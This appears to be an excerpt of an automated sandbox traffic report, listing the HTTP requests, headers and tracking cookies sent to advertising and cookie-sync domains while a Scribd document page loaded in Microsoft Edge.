Source: global trafficHTTP traffic detected: GET /?gdpr=0&gdpr_consent=&us_privacy=&r=https%3A%2F%2Flive.primis.tech%2Flive%2FliveCS.php%3Fsource%3Dexternal%26advId%3D154%26advUuid%3D%24UID%26gdpr%3D0%26gdpr_consent%3D%26us_privacy%3D HTTP/1.1Host: sync.ingage.techConnection: keep-alivesec-ch-ua: "Microsoft Edge";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36 Edg/117.0.2045.47sec-ch-ua-platform: "Windows"Accept: image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8Sec-Fetch-Site: cross-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: imageReferer: https://www.scribd.com/Accept-Encoding: gzip, deflate, brAccept-Language: en-GB,en;q=0.9,en-US;q=0.8
Source: global trafficHTTP traffic detected: GET /w/1.0/cm?gdpr=0&gdpr_consent=&id=58ceaaf5-c766-4c17-869a-d76e43401714&r=https%3A%2F%2Fcs-server-s2s.yellowblue.io%2Fcs%3Ffwrd%3D1%26aid%3D11563%26id%3D HTTP/1.1Host: us-u.openx.netConnection: keep-alivesec-ch-ua: "Microsoft Edge";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36 Edg/117.0.2045.47sec-ch-ua-platform: "Windows"Accept: image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8Sec-Fetch-Site: cross-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: imageReferer: https://cs-server-s2s.yellowblue.io/Accept-Encoding: gzip, deflate, brAccept-Language: en-GB,en;q=0.9,en-US;q=0.8
Source: global trafficHTTP traffic detected: GET /universal/v1?gdpr=0&gdpr_consent=&supply_id=5926d422 HTTP/1.1Host: match.sharethrough.comConnection: keep-alivesec-ch-ua: "Microsoft Edge";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36 Edg/117.0.2045.47sec-ch-ua-platform: "Windows"Accept: image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8Sec-Fetch-Site: cross-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: imageReferer: https://cs-server-s2s.yellowblue.io/Accept-Encoding: gzip, deflate, brAccept-Language: en-GB,en;q=0.9,en-US;q=0.8
Source: global trafficHTTP traffic detected: GET /us?consent_string=&gdpr=0&loc=https%3A%2F%2Fcs-server-s2s.yellowblue.io%2Fcs%3Ffwrd%3D1%26aid%3D115667%26uid%3D%5BUID%5D HTTP/1.1Host: sync.go.sonobi.comConnection: keep-alivesec-ch-ua: "Microsoft Edge";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36 Edg/117.0.2045.47sec-ch-ua-platform: "Windows"Accept: image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8Sec-Fetch-Site: cross-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: imageReferer: https://cs-server-s2s.yellowblue.io/Accept-Encoding: gzip, deflate, brAccept-Language: en-GB,en;q=0.9,en-US;q=0.8
Source: global trafficHTTP traffic detected: GET /utils/xapi/multi-sync.html?endpoint=us-east&p=rise_engage HTTP/1.1Host: secure-assets.rubiconproject.comConnection: keep-alivesec-ch-ua: "Microsoft Edge";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0sec-ch-ua-platform: "Windows"Upgrade-Insecure-Requests: 1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36 Edg/117.0.2045.47Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7Sec-Fetch-Site: cross-siteSec-Fetch-Mode: navigateSec-Fetch-Dest: iframeReferer: https://cs-server-s2s.yellowblue.io/Accept-Encoding: gzip, deflate, brAccept-Language: en-GB,en;q=0.9,en-US;q=0.8Cookie: khaos_p=M7A5IT3R-G-GNOQ; audit_p=1|p3NZOIPdcs7g2WF2nGvUU+SRTrMPTneuTTZKI3TR72YkDyl9IZRjbpAY6ebCcuOOT6F3oGgylxdCbuL7wqM7W24/AOYgyMTzmjbisE4m2Mfme0rGRDIQp2HZvLHXgE7qKreeM+I17A+st7tELqFbcc9dWb1LRf1hfY0V14FIbwNNc4QTpadywtzpQ7vzkXQ/; receive-cookie-deprecation=1
Source: global trafficHTTP traffic detected: GET /ps/?ri=0015a00002hdV5tAAE&ru=https%3A%2F%2Fcs-server-s2s.yellowblue.io%2Fcs%3Ffwrd%3D1%26aid%3D11580%26puid%3D33XUSERID33X HTTP/1.1Host: ssc-cms.33across.comConnection: keep-alivesec-ch-ua: "Microsoft Edge";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36 Edg/117.0.2045.47sec-ch-ua-platform: "Windows"Accept: image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8Sec-Fetch-Site: cross-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: imageReferer: https://cs-server-s2s.yellowblue.io/Accept-Encoding: gzip, deflate, brAccept-Language: en-GB,en;q=0.9,en-US;q=0.8
Source: global trafficHTTP traffic detected: GET /usersync2/rmpssp?sub=primis&gdpr=0&gdpr_consent= HTTP/1.1Host: sync.1rx.ioConnection: keep-alivesec-ch-ua: "Microsoft Edge";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36 Edg/117.0.2045.47sec-ch-ua-platform: "Windows"Accept: image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8Sec-Fetch-Site: cross-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: imageReferer: https://www.scribd.com/Accept-Encoding: gzip, deflate, brAccept-Language: en-GB,en;q=0.9,en-US;q=0.8
Source: global trafficHTTP traffic detected: GET /cookie?redirect_url=https%3A%2F%2Flive.primis.tech%2Flive%2FliveCS.php%3Fsource%3Dexternal%26advId%3D143%26advUuid%3D%24UID%26gdpr%3D0%26gdpr_consent%3D HTTP/1.1Host: cm.adform.netConnection: keep-alivesec-ch-ua: "Microsoft Edge";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36 Edg/117.0.2045.47sec-ch-ua-platform: "Windows"Accept: image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8Sec-Fetch-Site: cross-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: imageReferer: https://www.scribd.com/Accept-Encoding: gzip, deflate, brAccept-Language: en-GB,en;q=0.9,en-US;q=0.8
Source: global trafficHTTP traffic detected: GET /pixel?gdpr=0&gdpr_consent=&redir=https%3A%2F%2Fcs-server-s2s.yellowblue.io%2Fcs%3Ffwrd%3D1%26aid%3D11607%26uid%3D%24UID HTTP/1.1Host: ap.lijit.comConnection: keep-alivesec-ch-ua: "Microsoft Edge";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0sec-ch-ua-platform: "Windows"Upgrade-Insecure-Requests: 1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36 Edg/117.0.2045.47Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7Sec-Fetch-Site: cross-siteSec-Fetch-Mode: navigateSec-Fetch-Dest: iframeReferer: https://cs-server-s2s.yellowblue.io/Accept-Encoding: gzip, deflate, brAccept-Language: en-GB,en;q=0.9,en-US;q=0.8
Source: global trafficHTTP traffic detected: GET /usersync2/rmpssp?gdpr=%5BGDPR%5D&gdpr_consent=%5BUSER_CONSENT%5D&sub=typeaholdings HTTP/1.1Host: sync.1rx.ioConnection: keep-alivesec-ch-ua: "Microsoft Edge";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36 Edg/117.0.2045.47sec-ch-ua-platform: "Windows"Accept: image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8Sec-Fetch-Site: cross-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: imageReferer: https://cs-server-s2s.yellowblue.io/Accept-Encoding: gzip, deflate, brAccept-Language: en-GB,en;q=0.9,en-US;q=0.8
Source: global trafficHTTP traffic detected: GET /uploads/cn1/video/users/converted/29874/video_65ba1ab406070534415698/vid6793665ef0992447929939.jpg?cbuster=1737713253 HTTP/1.1Host: video.primis.techConnection: keep-alivesec-ch-ua: "Microsoft Edge";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36 Edg/117.0.2045.47sec-ch-ua-platform: "Windows"Accept: image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8Sec-Fetch-Site: cross-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: imageReferer: https://www.scribd.com/Accept-Encoding: gzip, deflate, brAccept-Language: en-GB,en;q=0.9,en-US;q=0.8Cookie: csuuid=67b433ed2421e
Source: global trafficHTTP traffic detected: GET /?gdpr=0&gdpr_consent=&pubid=11362&redirect=https%3A%2F%2Fcs-server-s2s.yellowblue.io%2Fcs%3Ffwrd%3D1%26aid%3D11571%26id%3D%7Bdevice_id%7D HTTP/1.1Host: csync.loopme.meConnection: keep-alivesec-ch-ua: "Microsoft Edge";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36 Edg/117.0.2045.47sec-ch-ua-platform: "Windows"Accept: image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8Sec-Fetch-Site: cross-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: imageReferer: https://cs-server-s2s.yellowblue.io/Accept-Encoding: gzip, deflate, brAccept-Language: en-GB,en;q=0.9,en-US;q=0.8Cookie: viewer_token=88d7ae9b-757d-4195-ad7d-f0171149038f
Source: global trafficHTTP traffic detected: GET /cm-notify?pi=rise HTTP/1.1Host: creativecdn.comConnection: keep-alivesec-ch-ua: "Microsoft Edge";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36 Edg/117.0.2045.47sec-ch-ua-platform: "Windows"Accept: image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8Sec-Fetch-Site: cross-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: imageReferer: https://cs-server-s2s.yellowblue.io/Accept-Encoding: gzip, deflate, brAccept-Language: en-GB,en;q=0.9,en-US;q=0.8
Source: global trafficHTTP traffic detected: GET /cookie?redirect_url=https%3A%2F%2Fcs-server-s2s.yellowblue.io%2Fcs%3Ffwrd%3D1%26aid%3D11606%26gdpr%3D%5BGDPR%5D%26gdpr_consent%3D%5BUSER_CONSENT%5D%26uid%3D%24UID HTTP/1.1Host: cm.adform.netConnection: keep-alivesec-ch-ua: "Microsoft Edge";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36 Edg/117.0.2045.47sec-ch-ua-platform: "Windows"Accept: image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8Sec-Fetch-Site: cross-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: imageReferer: https://cs-server-s2s.yellowblue.io/Accept-Encoding: gzip, deflate, brAccept-Language: en-GB,en;q=0.9,en-US;q=0.8
Source: global trafficHTTP traffic detected: GET /pixel?gdpr=0&gdpr_consent=&redir=https%3A%2F%2Flive.primis.tech%2Flive%2FliveCS.php%3Fsource%3Dexternal%26advId%3D130%26advUuid%3D%24UID&sovrn_retry=true HTTP/1.1Host: ap.lijit.comConnection: keep-alivesec-ch-ua: "Microsoft Edge";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36 Edg/117.0.2045.47sec-ch-ua-platform: "Windows"Accept: image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8Sec-Fetch-Site: cross-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: imageReferer: https://www.scribd.com/Accept-Encoding: gzip, deflate, brAccept-Language: en-GB,en;q=0.9,en-US;q=0.8
Source: global trafficHTTP traffic detected: GET /AdServer/js/user_sync.html?kdntuid=1&p=156696 HTTP/1.1Host: ads.pubmatic.comConnection: keep-alivesec-ch-ua: "Microsoft Edge";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0sec-ch-ua-platform: "Windows"Upgrade-Insecure-Requests: 1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36 Edg/117.0.2045.47Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7Sec-Fetch-Site: cross-siteSec-Fetch-Mode: navigateSec-Fetch-Dest: iframeReferer: https://www.scribd.com/Accept-Encoding: gzip, deflate, brAccept-Language: en-GB,en;q=0.9,en-US;q=0.8
Source: global trafficHTTP traffic detected: GET /track/rid?ttd_pid=j6w8ta9&fmt=json HTTP/1.1Host: match.adsrvr.orgConnection: keep-alivesec-ch-ua: "Microsoft Edge";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-platform: "Windows"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36 Edg/117.0.2045.47Content-Type: text/plainAccept: */*Origin: https://www.scribd.comSec-Fetch-Site: cross-siteSec-Fetch-Mode: corsSec-Fetch-Dest: emptyReferer: https://www.scribd.com/Accept-Encoding: gzip, deflate, brAccept-Language: en-GB,en;q=0.9,en-US;q=0.8
Source: global trafficHTTP traffic detected: GET /um/ixmatch.html HTTP/1.1Host: js-sec.indexww.comConnection: keep-alivesec-ch-ua: "Microsoft Edge";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0sec-ch-ua-platform: "Windows"Upgrade-Insecure-Requests: 1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36 Edg/117.0.2045.47Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7Sec-Fetch-Site: cross-siteSec-Fetch-Mode: navigateSec-Fetch-Dest: iframeReferer: https://www.scribd.com/Accept-Encoding: gzip, deflate, brAccept-Language: en-GB,en;q=0.9,en-US;q=0.8
Source: global trafficHTTP traffic detected: GET /redirectuser?consent_string=&gdpr=0&r=https%3A%2F%2Fcs-server-s2s.yellowblue.io%2Fcs%3Ffwrd%3D1%26aid%3D11612%26id%3D%24UID&sid=716 HTTP/1.1Host: ssp.disqus.comConnection: keep-alivesec-ch-ua: "Microsoft Edge";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0sec-ch-ua-platform: "Windows"Upgrade-Insecure-Requests: 1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36 Edg/117.0.2045.47Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7Sec-Fetch-Site: cross-siteSec-Fetch-Mode: navigateSec-Fetch-Dest: iframeReferer: https://cs-server-s2s.yellowblue.io/Accept-Encoding: gzip, deflate, brAccept-Language: en-GB,en;q=0.9,en-US;q=0.8
Source: global trafficHTTP traffic detected: GET /id HTTP/1.1Host: id.crwdcntrl.netConnection: keep-alivesec-ch-ua: "Microsoft Edge";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-platform: "Windows"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36 Edg/117.0.2045.47Content-Type: text/plainAccept: */*Origin: https://www.scribd.comSec-Fetch-Site: cross-siteSec-Fetch-Mode: corsSec-Fetch-Dest: emptyReferer: https://www.scribd.com/Accept-Encoding: gzip, deflate, brAccept-Language: en-GB,en;q=0.9,en-US;q=0.8Cookie: _cc_id=4e6cf26d9ffd6560f5c4b1ad4636338e
Source: global trafficHTTP traffic detected: GET /usync.html?endpoint=us-east&p=rise_engage HTTP/1.1Host: eus.rubiconproject.comConnection: keep-aliveUpgrade-Insecure-Requests: 1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36 Edg/117.0.2045.47Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7Sec-Fetch-Site: cross-siteSec-Fetch-Mode: navigateSec-Fetch-Dest: iframesec-ch-ua: "Microsoft Edge";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0sec-ch-ua-platform: "Windows"Referer: https://cs-server-s2s.yellowblue.io/Accept-Encoding: gzip, deflate, brAccept-Language: en-GB,en;q=0.9,en-US;q=0.8Cookie: khaos_p=M7A5IT3R-G-GNOQ; audit_p=1|p3NZOIPdcs7g2WF2nGvUU+SRTrMPTneuTTZKI3TR72YkDyl9IZRjbpAY6ebCcuOOT6F3oGgylxdCbuL7wqM7W24/AOYgyMTzmjbisE4m2Mfme0rGRDIQp2HZvLHXgE7qKreeM+I17A+st7tELqFbcc9dWb1LRf1hfY0V14FIbwNNc4QTpadywtzpQ7vzkXQ/; receive-cookie-deprecation=1
Source: global trafficHTTP traffic detected: GET /ima.js HTTP/1.1Host: cdn-ima.33across.comConnection: keep-alivesec-ch-ua: "Microsoft Edge";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36 Edg/117.0.2045.47sec-ch-ua-platform: "Windows"Accept: */*Sec-Fetch-Site: cross-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: scriptReferer: https://www.scribd.com/Accept-Encoding: gzip, deflate, brAccept-Language: en-GB,en;q=0.9,en-US;q=0.8If-None-Match: W/"678fc4e6-41f8"If-Modified-Since: Tue, 21 Jan 2025 16:01:42 GMT
Source: global trafficHTTP traffic detected: GET /pixel?gdpr=0&gdpr_consent=&redir=https%3A%2F%2Fcs-server-s2s.yellowblue.io%2Fcs%3Ffwrd%3D1%26aid%3D11607%26uid%3D%24UID&sovrn_retry=true HTTP/1.1Host: ap.lijit.comConnection: keep-aliveUpgrade-Insecure-Requests: 1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36 Edg/117.0.2045.47Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7Sec-Fetch-Site: cross-siteSec-Fetch-Mode: navigateSec-Fetch-Dest: iframesec-ch-ua: "Microsoft Edge";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0sec-ch-ua-platform: "Windows"Referer: https://cs-server-s2s.yellowblue.io/Accept-Encoding: gzip, deflate, brAccept-Language: en-GB,en;q=0.9,en-US;q=0.8
Source: global trafficHTTP traffic detected: GET /api/v1/getpixels?tagger_id=b9be9e1d9d5a9785a6417a9309e00232&url=https%3A%2F%2Fwww.scribd.com%2Fdocument%2F806838445%2FBank-Statement&code=%27none%27 HTTP/1.1Host: pixels.ad.gtConnection: keep-alivesec-ch-ua: "Microsoft Edge";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36 Edg/117.0.2045.47sec-ch-ua-platform: "Windows"Accept: */*Sec-Fetch-Site: cross-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: scriptReferer: https://www.scribd.com/Accept-Encoding: gzip, deflate, brAccept-Language: en-GB,en;q=0.9,en-US;q=0.8Cookie: au_id=AU1D-0100-001739863021-EHT1L4CA-5M76; au_3p_check=1
Source: global trafficHTTP traffic detected: GET /usersync2/rmpssp?sub=primis&zcc=1&cb=1739863027269 HTTP/1.1Host: sync.1rx.ioConnection: keep-alivesec-ch-ua: "Microsoft Edge";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36 Edg/117.0.2045.47sec-ch-ua-platform: "Windows"Accept: image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8Sec-Fetch-Site: cross-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: imageReferer: https://www.scribd.com/Accept-Encoding: gzip, deflate, brAccept-Language: en-GB,en;q=0.9,en-US;q=0.8
Source: global trafficHTTP traffic detected: GET /ats-modules/6ff45175-4a3f-453a-8ee5-b2b22dd6355c/ats.js HTTP/1.1Host: ats-wrapper.privacymanager.ioConnection: keep-alivesec-ch-ua: "Microsoft Edge";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36 Edg/117.0.2045.47sec-ch-ua-platform: "Windows"Accept: */*Sec-Fetch-Site: cross-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: scriptReferer: https://www.scribd.com/Accept-Encoding: gzip, deflate, brAccept-Language: en-GB,en;q=0.9,en-US;q=0.8
Source: global trafficHTTP traffic detected: GET /cs?fwrd=1&aid=11607&uid= HTTP/1.1Host: cs-server-s2s.yellowblue.ioConnection: keep-aliveUpgrade-Insecure-Requests: 1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36 Edg/117.0.2045.47Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7Sec-Fetch-Site: cross-siteSec-Fetch-Mode: navigateSec-Fetch-Dest: iframesec-ch-ua: "Microsoft Edge";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0sec-ch-ua-platform: "Windows"Referer: https://cs-server-s2s.yellowblue.io/Accept-Encoding: gzip, deflate, brAccept-Language: en-GB,en;q=0.9,en-US;q=0.8Cookie: wrvUserID=z4Tmd3x9kp_s
Source: global trafficHTTP traffic detected: GET /i/882/8.gif?o=api&id5id=ID5*s_otpEGT8l5l1-pR0yUCECeBgXaJJwB8TB_Zb5GMypr6ZXZK5xNmy6IwMlfm7XgG&gdpr_consent=undefined&gdpr=false HTTP/1.1Host: id5-sync.comConnection: keep-alivesec-ch-ua: "Microsoft Edge";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36 Edg/117.0.2045.47sec-ch-ua-platform: "Windows"Accept: image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8Sec-Fetch-Site: cross-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: imageReferer: https://www.scribd.com/Accept-Encoding: gzip, deflate, brAccept-Language: en-GB,en;q=0.9,en-US;q=0.8
Source: global trafficHTTP traffic detected: GET /cs?fwrd=1&aid=11592&uid=V22NFapzdQQi&ev=1&us_privacy=[US_PRIVACY]&gdpr_consent=&pid=562615&gdpr=0 HTTP/1.1Host: cs-server-s2s.yellowblue.ioConnection: keep-alivesec-ch-ua: "Microsoft Edge";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36 Edg/117.0.2045.47sec-ch-ua-platform: "Windows"Accept: image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8Sec-Fetch-Site: cross-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: imageReferer: https://cs-server-s2s.yellowblue.io/Accept-Encoding: gzip, deflate, brAccept-Language: en-GB,en;q=0.9,en-US;q=0.8Cookie: wrvUserID=z4Tmd3x9kp_s
Source: global trafficHTTP traffic detected: GET /sync?redirect=https%3A%2F%2Fcs-server-s2s.yellowblue.io%2Fcs%3Ffwrd%3D1%26aid%3D11595%26id%3D%7BID5UID%7D&gdpr_consent=&gdpr=0&us_privacy=&gdpr_pd=&source=5&google_push=&retry= HTTP/1.1Host: sync.inmobi.comConnection: keep-alivesec-ch-ua: "Microsoft Edge";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36 Edg/117.0.2045.47sec-ch-ua-platform: "Windows"Accept: image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8Sec-Fetch-Site: cross-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: imageReferer: https://cs-server-s2s.yellowblue.io/Accept-Encoding: gzip, deflate, brAccept-Language: en-GB,en;q=0.9,en-US;q=0.8
Source: global trafficHTTP traffic detected: GET /cs?fwrd=1&aid=115667&uid=5b23e17a-294a-4886-be16-dbab49a7a932 HTTP/1.1Host: cs-server-s2s.yellowblue.ioConnection: keep-alivesec-ch-ua: "Microsoft Edge";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36 Edg/117.0.2045.47sec-ch-ua-platform: "Windows"Accept: image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8Sec-Fetch-Site: cross-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: imageReferer: https://cs-server-s2s.yellowblue.io/Accept-Encoding: gzip, deflate, brAccept-Language: en-GB,en;q=0.9,en-US;q=0.8Cookie: wrvUserID=z4Tmd3x9kp_s
Source: global trafficHTTP traffic detected: GET /cs?fwrd=1&aid=11580&puid=213023946785716 HTTP/1.1Host: cs-server-s2s.yellowblue.ioConnection: keep-alivesec-ch-ua: "Microsoft Edge";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36 Edg/117.0.2045.47sec-ch-ua-platform: "Windows"Accept: image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8Sec-Fetch-Site: cross-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: imageReferer: https://cs-server-s2s.yellowblue.io/Accept-Encoding: gzip, deflate, brAccept-Language: en-GB,en;q=0.9,en-US;q=0.8Cookie: wrvUserID=z4Tmd3x9kp_s
